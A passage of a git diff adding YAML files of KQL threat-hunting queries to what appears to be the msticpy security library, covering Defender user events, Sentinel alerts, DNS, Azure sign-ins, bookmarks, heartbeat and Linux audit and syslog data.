new file mode 100644
index 000000000..3313f1584
--- /dev/null
+++ b/msticpy/data/queries/kql_mdatp_user.yaml
@@ -0,0 +1,78 @@
+metadata:
+  version: 1
+  description: MDATP Queries
+  data_environments: [MDATP, MDE, M365D]
+  data_families: [MDATP]
+  tags: ["user"]
+defaults:
+  metadata:
+    data_source: "user_events"
+  parameters:
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ""
+sources:
+  user_logons:
+    description: Lists all user logons by user
+    metadata:
+    args:
+      query: '
+        DeviceLogonEvents
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where AccountName has "{account_name}"
+        {add_query_items}'
+      uri: None
+    parameters:
+      account_name:
+        description: Name of user
+        type: str
+  user_processes:
+    description: Lists all processes created by a user
+    metadata:
+    args:
+      query: '
+        DeviceProcessEvents
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where AccountName has "{account_name}"
+        {add_query_items}'
+    parameters:
+      account_name:
+        description: Name of user
+        type: str
+  user_files:
+    description: Lists all files created by a user
+    metadata:
+    args:
+      query: '
+        DeviceFileEvents
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where InitiatingProcessAccountName contains "{account_name}"
+        {add_query_items}'
+    parameters:
+      account_name:
+        description: Name of user
+        type: str
+  user_network:
+    description: Lists all network connections associated with a user
+    metadata:
+    args:
+      query: '
+        DeviceNetworkEvents
+        | where Timestamp >= datetime({start})
+        | where Timestamp <= datetime({end})
+        | where InitiatingProcessAccountName contains "{account_name}"
+        {add_query_items}'
+    parameters:
+      account_name:
+        description: Name of user
+        type: str
diff --git a/msticpy/data/queries/kql_sent_alert.yaml b/msticpy/data/queries/kql_sent_alert.yaml
new file mode 100644
index 000000000..7f44e0443
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_alert.yaml
@@ -0,0 +1,217 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Alert Queries
+  data_environments: [LogAnalytics]
+  data_families: [SecurityAlert]
+  tags: ['alert', 'securityalert']
+defaults:
+  metadata:
+    data_source: 'security_alert'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityAlert'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project-rename StartTimeUtc = StartTime, EndTimeUtc = EndTime,
+          AlertDisplayName = DisplayName, Severity = AlertSeverity
+          | extend AlertType = iif(isempty(AlertType), AlertName, AlertType)'
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+sources:
+  list_alerts:
+    description: Retrieves list of alerts
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        {add_query_items}'
+      uri: None
+    parameters:
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+  list_alerts_counts:
+    description: Retrieves summary count of alerts by type
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | summarize alertCount=count(), firstAlert=min(TimeGenerated),
+            lastAlert=max(TimeGenerated) by AlertName
+        | order by alertCount desc
+        {add_query_items}'
+    parameters:
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+  get_alert:
+    description: Retrieves a single alert by SystemAlertId
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | extend extendedProps = parse_json(ExtendedProperties)
+        | extend CompromisedEntity = tostring(extendedProps["Compromised Host"])
+        | project-away extendedProps
+        | where SystemAlertId == "{system_alert_id}"
+        {add_query_items}'
+    parameters:
+      system_alert_id:
+        description: 'The ID of the alert'
+        type: str
+  list_related_alerts:
+    description: Retrieves list of alerts with a common host, account or process
+    metadata:
+      pivot:
+        short_name: alerts
+        direct_func_entities:
+          - Host
+          - Account
+          - IpAddress
+          - Process
+    args:
+      query: '
+        let src_host = "{host_name}";
+        let src_acct = "{account_name}";
+        let src_proc = "{process_name}";
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend Computer = src_host
+        | extend src_hostname = tostring(split(src_host, ".")[0])
+        | extend src_accountname = iif(src_acct contains "\\\\",
+                                      tostring(split(src_acct, "\\\\")[-1]),
+                                      tostring(split(src_acct, "@")[0]))
+        | extend src_procname = tostring(split(src_proc, "{path_separator}")[-1])
+        | extend host_match = iif(isnotempty(src_host) and
+            (Entities has src_hostname or Entities has src_host
+            or ExtendedProperties has src_hostname
+            or ExtendedProperties has src_host), true, false)
+        | extend acct_match = iif(isnotempty(src_acct)
+            and (Entities has src_accountname or Entities has src_acct
+            or ExtendedProperties has src_accountname
+            or ExtendedProperties has src_acct), true, false)
+        | extend proc_match = iif(isnotempty(src_proc)
+            and (Entities has src_procname or Entities has src_proc
+            or ExtendedProperties has src_procname
+            or ExtendedProperties has src_proc), true, false)
+        | where host_match or acct_match or proc_match
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: The hostname to find
+        type: str
+        default: ''
+      account_name:
+        description: The account name to find
+        type: str
+        default: ''
+      process_name:
+        description: The process name to find
+        type: str
+        default: ''
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+  list_alerts_for_ip:
+    description: Retrieves list of alerts with a common IP Address
+    metadata:
+    args:
+      query: '
+        let src_ips = "{source_ip_list}";
+        let src_ips_arr = split(src_ips, ",");
+        let IP_table = toscalar(range idx from 0 to array_length(src_ips_arr) - 1 step 1
+        | extend ip = trim(@"\\s*", tostring(src_ips_arr[idx]))
+        | project ip
+        | distinct ip
+        | summarize makeset(ip) );
+        let ip_extract = materialize(
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | project SystemAlertId, ExtendedProperties, Entities
+        | extend source_ips_str =
+            extract("\"Source IPs\": \"([^\"]+)\"", 1, ExtendedProperties)
+        | extend source_ips_1 =
+            iif(isnotempty(source_ips_str), split(source_ips_str, ","), dynamic([]))
+        | extend source_ips_2 =
+            extract_all("\"Address\": \"([^\"]+)\"", dynamic([1]), Entities)
+        | mvexpand alert_ip_1 =
+            source_ips_1 to typeof(string), alert_ip_2 = source_ips_2 to typeof(string)
+        | where isnotempty(alert_ip_1) or isnotempty(alert_ip_2)
+        | where alert_ip_1 in (IP_table) or alert_ip_2 in (IP_table)
+        | extend matching_ips = case(isnotempty(alert_ip_1) and isnotempty(alert_ip_2),
+                                        strcat(alert_ip_1, ",", alert_ip_2),
+                                    isnotempty(alert_ip_1), alert_ip_1,
+                                    isnotempty(alert_ip_2), alert_ip_2,
+                                    "")
+        | extend MatchingIps = split(matching_ips, ",")
+        | project-away source_ips_str, source_ips_1, source_ips_2,
+            alert_ip_1, alert_ip_2, matching_ips
+        );
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | join (ip_extract) on SystemAlertId
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityAlert'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project-rename StartTimeUtc = StartTime, EndTimeUtc = EndTime,
+          AlertDisplayName = DisplayName, Severity = AlertSeverity
+          | extend AlertType = iif(isempty(AlertType), AlertName, AlertType)'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      source_ip_list:
+        description: List of one or more IPs to match
+        type: str
\ No newline at end of file
diff --git a/msticpy/data/queries/kql_sent_az_dns.yaml b/msticpy/data/queries/kql_sent_az_dns.yaml
new file mode 100644
index 000000000..cfb154ad6
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_az_dns.yaml
@@ -0,0 +1,82 @@
+metadata:
+  version: 1
+  description: Azure Network Analytics Queries
+  data_environments: [LogAnalytics]
+  data_families: [AzureNetwork]
+  tags: ['network', 'azure']
+defaults:
+  metadata:
+    data_source: 'DNSAnalytics'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: DnsEvents
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+sources:
+  dns_lookups_for_domain:
+    description: Dns queries for a domain
+    metadata:
+      pivot:
+        short_name: queries
+        direct_func_entities:
+          - Dns
+    args:
+      query: '
+        {table}
+        | where SubType == "LookupQuery"
+        | where Name has "{domain}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      domain:
+        description: Domain to query for
+        type: str
+  dns_lookups_for_ip:
+    description: Dns queries for a domain
+    metadata:
+      pivot:
+        short_name: queries
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: '
+        {table}
+        | where SubType == "LookupQuery"
+        | where IPAddresses has "{ip_address}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      ip_address:
+        description: IP lookup result to query for
+        type: str
+  dns_lookups_from_ip:
+    description: Dns queries for a domain
+    metadata:
+      pivot:
+        short_name: queries_from_ip
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: '
+        {table}
+        | where SubType == "LookupQuery"
+        | where ClientIP == "{ip_address}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      ip_address:
+        description: IP source for lookup queries
+        type: str
\ No newline at end of file
diff --git a/msticpy/data/queries/kql_sent_az_network.yaml b/msticpy/data/queries/kql_sent_az_network.yaml
new file mode 100644
index 000000000..3f5186f05
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_az_network.yaml
@@ -0,0 +1,83 @@
+metadata:
+  version: 1
+  description: Azure Network Analytics Queries
+  data_environments: [LogAnalytics]
+  data_families: [AzureNetwork]
+  tags: ['network', 'azure']
+defaults:
+  metadata:
+    data_source: 'AzureNetworkAnalytics'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'AzureNetworkAnalytics_CL'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project TenantId, TimeGenerated,
+            FlowStartTime = FlowStartTime_t,
+            FlowEndTime = FlowEndTime_t,
+            FlowIntervalEndTime = FlowIntervalEndTime_t,
+            FlowType = FlowType_s,
+            ResourceGroup = split(VM_s, "/")[0],
+            VMName = split(VM_s, "/")[1],
+            VMIPAddress = VMIP_s,
+            PublicIPs = extractall(@"([\d\.]+)[|\d]+", dynamic([1]), PublicIPs_s),
+            SrcIP = SrcIP_s,
+            DestIP = DestIP_s,
+            ExtIP = iif(FlowDirection_s == "I", SrcIP_s, DestIP_s),
+            L4Protocol = L4Protocol_s,
+            L7Protocol = L7Protocol_s,
+            DestPort = DestPort_d,
+            FlowDirection = FlowDirection_s,
+            AllowedOutFlows = AllowedOutFlows_d,
+            AllowedInFlows = AllowedInFlows_d,
+            DeniedInFlows = DeniedInFlows_d,
+            DeniedOutFlows = DeniedOutFlows_d,
+            RemoteRegion = AzureRegion_s,
+            VMRegion = Region_s'
+sources:
+  az_net_analytics:
+    description: All Azure Network Analytics Data
+    metadata:
+      pivot:
+        short_name: net_flows_depr
+    args:
+      query: '
+        {table}
+        | where SubType_s == "FlowLog"
+        | where VM_s contains "{host_name}"
+        | where FlowStartTime_t >= datetime({start})
+        | where FlowEndTime_t <= datetime({end})
+        {query_project}
+        | extend AllExtIPs = iif(isempty(PublicIPs), pack_array(ExtIP),
+                         iif(isempty(ExtIP), PublicIPs, array_concat(PublicIPs, pack_array(ExtIP)))
+                         )
+        | project-away ExtIP
+        | mvexpand AllExtIPs
+        {where_clause}'
+    parameters:
+      host_name:
+        description: Hostname to query for
+        type: str
+        default: ''
+      where_clause:
+        description: Optional additional filter clauses
+        type: str
+        default: ''
diff --git a/msticpy/data/queries/kql_sent_azure.yaml b/msticpy/data/queries/kql_sent_azure.yaml
new file mode 100644
index 000000000..c209e1b02
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_azure.yaml
@@ -0,0 +1,266 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Azure
+  data_environments: [LogAnalytics]
+  data_families: [Azure]
+  tags: ['signin', 'logon', 'azure', 'aad', "activedirectory"]
+defaults:
+  metadata:
+    data_source: 'Azure'
+  parameters:
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: ''
+sources:
+  list_aad_signins_for_account:
+    description: Lists Azure AD Signins for Account
+    metadata:
+      pivot:
+        short_name: signins
+        direct_func_entities:
+          - Account
+    args:
+      query: '
+        let accountName = "{account_name}";
+        let account = case(
+            accountName has "@", tostring(split(accountName, "@")[0]),
+            accountName has "\\", tostring(split(accountName, "\\")[1]),
+            accountName
+        );
+        {table}
+        | where UserPrincipalName has account
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: SigninLogs
+      account_name:
+        description: The account name to find
+        type: str
+  list_aad_signins_for_ip:
+    description: Lists Azure AD Signins for an IP Address
+    metadata:
+      pivot:
+        short_name: signins
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: '
+        {table}
+        | where IPAddress in ({ip_address_list})
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: SigninLogs
+      ip_address_list:
+        description: The IP Address or list of Addresses
+        type: list
+  list_azure_activity_for_account:
+    description: Lists Azure Activity for Account
+    metadata:
+      pivot:
+        short_name: activity
+        direct_func_entities:
+          - Account
+    args:
+      query: '
+        let accountName = "{account_name}";
+        let account = case(
+            accountName has "@", tostring(split(accountName, "@")[0]),
+            accountName has "\\", tostring(split(accountName, "\\")[1]),
+            accountName
+        );
+        {table}
+        | where Caller has account
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: AzureActivity
+      account_name:
+        description: The account name to find
+        type: str
+  list_azure_activity_for_ip:
+    description: Lists Azure Activity for Caller IP Address(es)
+    metadata:
+      pivot:
+        short_name: activity
+        direct_func_entities:
+          - IpAddress
+    args:
+      query: '
+        {table}
+        | where CallerIpAddress in ({ip_address_list})
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: AzureActivity
+      ip_address_list:
+        description: The IP Address or list of Addresses
+        type: list
+  list_azure_activity_for_resource:
+    description: Lists Azure Activity for a Resource
+    metadata:
+      pivot:
+        short_name: activity
+        direct_func_entities:
+          - AzureResource
+    args:
+      query: '
+        {table}
+        | where ResourceId has "{resource_id}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: AzureActivity
+      resource_id:
+        description: ResourceId or substring
+        type: str
+        aliases:
+          - resource
+  list_all_signins_geo:
+    description: Gets Signin data used by morph charts
+    metadata:
+    args:
+      query: '
+        {table}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend Result = iif(ResultType==0, "Sucess", "Failed")
+        | extend Latitude = tostring(parse_json(tostring(LocationDetails.geoCoordinates)).latitude)
+        | extend Longitude = tostring(parse_json(tostring(LocationDetails.geoCoordinates)).longitude)
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: SigninLogs
+  list_storage_ops_for_ip:
+    description:
+    metadata:
+      pivot:
+        short_name: storage_ops
+    args:
+      query: '
+        union
+        StorageFileLogs,
+        StorageBlobLogs
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where OperationName =~ "PutBlob" or OperationName =~ "PutRange"
+        | extend ClientIP = tostring(split(CallerIpAddress, ":", 0)[0])
+        | where ClientIP == {ip_address}
+        | extend FileName = extract(@"\/([\w\-. ]+)\?", 1, Uri)
+        | extend base64Char = base64_decode_toarray(ResponseMd5)
+        | mv-expand base64Char
+        | extend hexChar = tohex(toint(base64Char))
+        | extend hexChar = iff(strlen(hexChar) < 2, strcat("0", hexChar), hexChar)
+        | extend SourceTable = iff(OperationName has "range", "StorageFileLogs", "StorageBlobLogs")
+        | summarize make_list(hexChar) by CorrelationId, ResponseMd5, FileName, AccountName, TimeGenerated, RequestBodySize, ClientIP, SourceTable
+        | extend Md5Hash = strcat_array(list_hexChar, "")
+        | project TimeGenerated, FileName, ClientIP, SourceTable, Md5Hash, AccountName, RequestBodySize
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: StorageFileLogs
+      ip_address:
+        description: Client IP Address
+        type: str
+  list_storage_ops_for_hash:
+    description:
+    args:
+      query: '
+        union
+        StorageFileLogs,
+        StorageBlobLogs
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where OperationName =~ "PutBlob" or OperationName =~ "PutRange"
+        | extend ClientIP = tostring(split(CallerIpAddress, ":", 0)[0])
+        | extend FileName = extract(@"\/([\w\-. ]+)\?", 1, Uri)
+        | extend base64Char = base64_decode_toarray(ResponseMd5)
+        | mv-expand base64Char
+        | extend hexChar = tohex(toint(base64Char))
+        | extend hexChar = iff(strlen(hexChar) < 2, strcat("0", hexChar), hexChar)
+        | extend SourceTable = iff(OperationName has "range", "StorageFileLogs", "StorageBlobLogs")
+        | summarize make_list(hexChar) by CorrelationId, ResponseMd5, FileName, AccountName, TimeGenerated, RequestBodySize, ClientIP, SourceTable
+        | extend Md5Hash = strcat_array(list_hexChar, "")
+        | where Md5Hash =~ {file_hash}
+        | project TimeGenerated, FileName, ClientIP, SourceTable, Md5Hash, AccountName, RequestBodySize
+        {add_query_items}'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: StorageFileLogs
+      file_hash:
+        description: MD5 hash of file
+        type: str
+  get_vmcomputer_for_ip:
+    description: Gets latest VMComputer record for IPAddress
+    metadata:
+      pivot:
+        short_name: vmcomputer
+    args:
+      query: '
+        {table}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Ipv4Addresses has "{ip_address}"
+        | order by TimeGenerated desc
+        | take 1'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: VMComputer
+      ip_address:
+        description: The IP Address of the VM
+        type: str
+  get_vmcomputer_for_host:
+    description: Gets latest VMComputer record for Host
+    metadata:
+      pivot:
+        short_name: vmcomputer
+    args:
+      query: '
+        {table}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer has "{host_name}"
+        | take 1'
+    parameters:
+      table:
+        description: Table name
+        type: str
+        default: VMComputer
+      host_name:
+        description: The Computer name of the VM
+        type: str
\ No newline at end of file
diff --git a/msticpy/data/queries/kql_sent_azuresentinel.yaml b/msticpy/data/queries/kql_sent_azuresentinel.yaml
new file mode 100644
index 000000000..c617c90d9
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_azuresentinel.yaml
@@ -0,0 +1,167 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Azure Sentinel and Bookmark Queries
+  data_environments: [LogAnalytics]
+  data_families: [AzureSentinel]
+  tags: ['investigation', 'bookmark', 'investigation']
+defaults:
+  metadata:
+    data_source: 'bookmark'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'HuntingBookmark'
+      query_project:
+        description: Column project statement
+        type: str
+        default: ''
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+sources:
+  list_bookmarks:
+    description: Retrieves list of bookmarks
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend QryResults = todynamic(QueryResultRow)
+        | extend Computer = QryResults["Computer"]
+        | extend Account = QryResults["Account"]
+        | extend Entities = QryResults.__entityMapping
+        | project-away QryResults
+        | where SoftDeleted == false
+        {add_query_items}'
+    parameters:
+  list_bookmarks_for_entity:
+    description: Retrieves bookmarks for entity string
+    metadata:
+      pivot:
+        short_name: bookmarks
+        direct_func_entities:
+          - Host
+          - Account
+          - IpAddress
+          - Url
+          - Dns
+    args:
+      query: '
+        let entity_str = case(
+          "{host_name}" != "na", "{host_name}",
+          "{account_name}" != "na", "{account_name}",
+          "{ip_address}" != "na", "{ip_address}",
+          "{domain}" != "na", "{domain}",
+          "{url}" != "na", "{url}",
+          "{entity_id}" != "na", "{entity_id}",
+          "no_entity_id"
+        );
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where QueryResultRow has entity_str
+        | extend QryResults = todynamic(QueryResultRow)
+        | extend Computer = QryResults["Computer"]
+        | extend Account = QryResults["Account"]
+        | extend Entities = QryResults.__entityMapping
+        | project-away QryResults
+        | where SoftDeleted == false
+        {add_query_items}'
+    parameters:
+      entity_id:
+        description: Identifier of entity
+        type: str
+        default: na
+      host_name:
+        description: Host name
+        type: str
+        default: na
+      account_name:
+        description: Account name
+        type: str
+        default: na
+      ip_address:
+        description: IP address
+        type: str
+        default: na
+      domain:
+        description: Domain name
+        type: str
+        default: na
+      url:
+        description: Url name
+        type: str
+        default: na
+  get_bookmark_by_id:
+    description: Retrieves a single Bookmark by BookmarkId
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        HuntingBookmark
+        | where BookmarkId =~ "{bookmark_id}"
+        | extend QryResults = todynamic(QueryResultRow)
+        | extend Computer = QryResults["Computer"]
+        | extend Account = QryResults["Account"]
+        | extend Entities = QryResults.__entityMapping
+        | project-away QryResults
+        | where SoftDeleted == false
+        {add_query_items}'
+    parameters:
+      bookmark_id:
+        description: Identitifier of bookmark
+        type: str
+  get_bookmark_by_name:
+    description: Retrieves one or more Bookmarks by Bookmark Name
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where BookmarkName has "{bookmark_name}"
+        | extend QryResults = todynamic(QueryResultRow)
+        | extend Computer = QryResults["Computer"]
+        | extend Account = QryResults["Account"]
+        | extend Entities = QryResults.__entityMapping
+        | project-away QryResults
+        | where SoftDeleted == false
+        {add_query_items}'
+    parameters:
+      bookmark_name:
+        description: Name or part name of B
+        type: str
+  list_bookmarks_for_tags:
+    description: Retrieves Bookmark by one or mare Tags
+    metadata:
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | mvexpand Tag=todynamic(Tags)
+        | where SoftDeleted == false
+        | where Tag in~ in ({bookmark_tags})
+        | extend QryResults = todynamic(QueryResultRow)
+        | extend Computer = QryResults["Computer"]
+        | extend Account = QryResults["Account"]
+        | extend Entities = QryResults.__entityMapping
+        | project-away QryResults, Tag
+        | distinct *
+        {add_query_items}'
+    parameters:
+      bookmark_tags:
+        description: Bookmark tags
+        type: list
diff --git a/msticpy/data/queries/kql_sent_heartbeat_info.yaml b/msticpy/data/queries/kql_sent_heartbeat_info.yaml
new file mode 100644
index 000000000..2508bc669
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_heartbeat_info.yaml
@@ -0,0 +1,74 @@
+metadata:
+  version: 1
+  description: Heartbeat - Gather Host system information details
+  data_environments: [LogAnalytics]
+  data_families: [Heartbeat]
+  tags: ['Heartbeat','host','ip','osinfo']
+defaults:
+  metadata:
+    data_source: 'Heartbeat'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'Heartbeat'
+      query_project:
+        description: Column project statement
+        type: str
+        default: ''
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: '
+        | top 1 by TimeGenerated desc nulls last'
+sources:
+  get_info_by_hostname:
+    description: Deprecated - use 'get_heartbeat_for_host'
+    metadata:
+      pivot:
+        short_name: heartbeat_for_host_depr
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where Computer {host_op} "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      host_op:
+        description: The hostname match operator
+        type: str
+        default: has
+  get_info_by_ipaddress:
+    description: Deprecated - use 'get_heartbeat_for_ip'
+    metadata:
+      pivot:
+        short_name: heartbeat_for_ip_depr
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where {subscription_filter}
+        | where ComputerIP == "{ip_address}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      ip_address:
+        description: IP address value
+        type: str
diff --git a/msticpy/data/queries/kql_sent_lxauditd.yaml b/msticpy/data/queries/kql_sent_lxauditd.yaml
new file mode 100644
index 000000000..bf3712b47
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_lxauditd.yaml
@@ -0,0 +1,51 @@
+metadata:
+  version: 1
+  description: Linux Auditd Queries
+  data_environments: [LogAnalytics]
+  data_families: [LinuxAudit]
+  tags: ['linux', 'audit', "auditd"]
+defaults:
+  metadata:
+    data_source: 'linux_auditd'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'AuditLog_CL'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      host_name:
+        description: Hostname to query for
+        type: str
+        default: ''
+sources:
+  auditd_all:
+    description: Extract all audit messages grouped by mssg_id
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer has "{host_name}"
+        | extend mssg_parts = extract_all(@"type=(?P<type>[^\s]+)\s+msg=audit\((?P<mssg_id>[^)]+)\):\s+(?P<mssg>[^\r]+)\r?",
+          dynamic(["type", "mssg_id", "mssg"]), RawData)
+        | extend mssg_type = tostring(mssg_parts[0][0]), mssg_id = tostring(mssg_parts[0][1])
+        | project TenantId, TimeGenerated, Computer, mssg_type, mssg_id, mssg_parts
+        | extend mssg_content = split(mssg_parts[0][2], " ")
+        | extend typed_mssg = pack(mssg_type, mssg_content)
+        | summarize AuditdMessage = makelist(typed_mssg) by TenantId, TimeGenerated, Computer, mssg_id
+        {add_query_items}'
+    parameters:
diff --git a/msticpy/data/queries/kql_sent_lxsyslog_activity.yaml b/msticpy/data/queries/kql_sent_lxsyslog_activity.yaml
new file mode 100644
index 000000000..230ae9660
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_lxsyslog_activity.yaml
@@ -0,0 +1,116 @@
+metadata:
+  version: 1
+  description: Linux Syslog Host Activity Queries
+  data_environments: [LogAnalytics]
+  data_families: [LinuxSyslog]
+  tags: ['linux', 'syslog']
+defaults:
+  metadata:
+    data_source: 'linux_syslog'
+    pivot:
+      direct_func_entities:
+        - Host
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'Syslog'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      host_name:
+        description: Hostname to query for
+        type: str
+        default: ''
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project
+            TenantId,
+            Computer,
+            Facility,
+            TimeGenerated,
+            HostName,
+            SeverityLevel,
+            SyslogMessage,
+            ProcessID,
+            ProcessName,
+            HostIP,
+          | extend TimeCreatedUtc=TimeGenerated'
+sources:
+  sudo_activity:
+    description: All sudo activity
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where Computer has "{host_name}"
+        | where ProcessName == "sudo"
+        | extend SudoResult = iif(SyslogMessage contains "authentication failure", "Failure", "Sucess")
+        | extend Sudoer = extract("(by |user=)([[:alnum:]]+)",2,SyslogMessage), SudoTo = extract("for user ([A-Z,a-z,0-9]+)",1,SyslogMessage),Command=extract("(COMMAND=|\\(command continued\\))(.*)$",2,SyslogMessage), CommandCallTmp=extract("COMMAND=([[:graph:]]*)",1,SyslogMessage)
+        | extend CommandCall = iif(isnotempty(Command),iif(isempty(CommandCallTmp), "None", CommandCallTmp),"")
+        | where SyslogMessage contains "{account_name}" or Sudoer contains "{account_name}" or SyslogMessage contains "session closed for user root"
+        {add_query_items}'
+    parameters:
+      account_name:
+        description: Username to filter the search by
+        type: str
+        default: ''
+  cron_activity:
+    description: All cron activity
+    args:
+      query: '
+        {table}
+        | where {subscription_filter}
